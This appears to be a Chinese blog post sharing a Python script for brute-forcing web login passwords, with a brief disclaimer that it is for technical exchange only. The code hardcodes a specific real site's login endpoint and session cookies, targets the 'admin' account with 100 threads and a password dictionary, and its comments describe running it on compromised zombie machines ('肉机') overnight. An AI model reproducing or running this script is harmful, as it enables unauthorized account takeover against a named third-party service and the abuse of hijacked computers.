python web密码爆破脚本
声明:工具仅用于技术交流,请勿违法
如下
# -*- coding: utf-8 -*-
'''
肉机爆破密码脚本
由于是面向肉机的脚本,所以牺牲了一些速度,增加了准确性
程序挂肉机上然后去睡觉等结果嘛
从这里复制了代码:https://blog.csdn.net/tempulcc/article/details/108323499
对于没pip的机器,可把模块打包成zip,上传的机器上用unzip解压
需要自行配置请求数据包,数据包信息位于:brutepwd.brute
'''
import threading
import queue
import sys,os
import requests
import time
try:
color=0
from core.color import *
color=1
except:
pass
print('it has started,please wait...')
time1=time.time()
unames=r'' #用户名字典位置
passwords=r"merged.txt" #密码字典位置
thread_num=100 #线程数
timeouts=100 #对于发送失败的数据包重新尝试几次
#your_email='' #你的邮箱地址
pswd_err_content=68 #密码错误时返回包的len
def send_email(value):
global time1
time2=time.time()
with open('satori_s_password_HereHereHereHereHere.txt','a') as f:
f.write(value + '\n')
f.write('time:'+ str(time2-time1) + '\n')
class brutepwd(threading.Thread):
def __init__(self,q,ss):
threading.Thread.__init__(self)
self.__queue=q
self.__session=ss
def run(self):
while not self.__queue.empty():
pwd=self.__queue.get()
ss=self.__session
self.brute(pwd,ss)
def brute(self,pwd,session,uname='admin'):
print('\r'+pwd,end='\r')
global pswd_err_content
timeout_bool=True
res=None
###数据包信息请自行配置👇
url = "https://wx.zhengzhong.cn/zz/logon/postLogin.do"
headers = {
"Host": "wx.zhengzhong.cn",
"Cookie": "JSESSIONID=5461E58745BECFDC8CBF95AA3C801792; session=eyJzeXN0ZW1UeXBlIjoiIn0.ZiHpDw.NvbN9KtTyig06Q6sX3FuKGthQG0; sensorsdata2015jssdkcrossZQSensorsObj=%7B%22distinct_id%22%3A%2218efc1ce44647f-034c33f8fa07b9c-4c657b58-2073600-18efc1ce44710f2%22%2C%22first_id%22%3A%22%22%2C%22props%22%3A%7B%22%24latest_traffic_source_type%22%3A%22%E7%9B%B4%E6%8E%A5%E6%B5%81%E9%87%8F%22%2C%22%24latest_search_keyword%22%3A%22%E6%9C%AA%E5%8F%96%E5%88%B0%E5%80%BC_%E7%9B%B4%E6%8E%A5%E6%89%93%E5%BC%80%22%2C%22%24latest_referrer%22%3A%22%22%2C%22%24latest_landing_page%22%3A%22http%3A%2F%2Fwww.zhengzhong.cn%2F%22%7D%2C%22%24device_id%22%3A%2218efc1ce44647f-034c33f8fa07b9c-4c657b58-2073600-18efc1ce44710f2%22%7D",
"Content-Length": "35",
"Sec-Ch-Ua": "\"Chromium\";v=\"124\", \"Microsoft Edge\";v=\"124\", \"Not-A.Brand\";v=\"99\"",
"Accept": "*/*",
"Content-Type": "application/json",
"X-Requested-With": "XMLHttpRequest",
"Sec-Ch-Ua-Mobile": "?0",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0",
"Sec-Ch-Ua-Platform": "\"Windows\"",
"Origin": "https://wx.zhengzhong.cn",
"Sec-Fetch-Site": "same-origin",
"Sec-Fetch-Mode": "cors",
"Sec-Fetch-Dest": "empty",
"Referer": "https://wx.zhengzhong.cn/zz/system/login",
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",
"Priority": "u=1, i",
"Connection": "close"
}
data = {"name":uname,"password":{pwd}}
###数据包信息👆
fre=0
while timeout_bool:
if fre < timeouts:
try:
res=session.post(url=url,headers=headers,data=data,timeout=3)
timeout_bool=False
except:
fre+=1
continue
else:
break
#print(len(res.content),pwd,fre)#查看content的len
try:
if len(res.content)!=pswd_err_content:
if color==1:
print (TOgreen(pwd))
else:
print (pwd)
send_email(pwd)
except:
print('\n超时,连接释放:\n'+pwd)
def main():
threads=[]
global thread_num
thread_num=thread_num
q=queue.Queue()
ss = requests.session()
with open(passwords, 'r',encoding='utf-8') as f:
password = f.readlines()
for pwd in password:
pwd = pwd.strip('\n')
q.put(pwd)
for t in range(thread_num):
t=brutepwd(q=q,ss=ss)
threads.append(t)
for i in threads:
i.start()
for i in threads:
i.join()
send_email('-------------------------------Down: '+str(time.time()))
main()
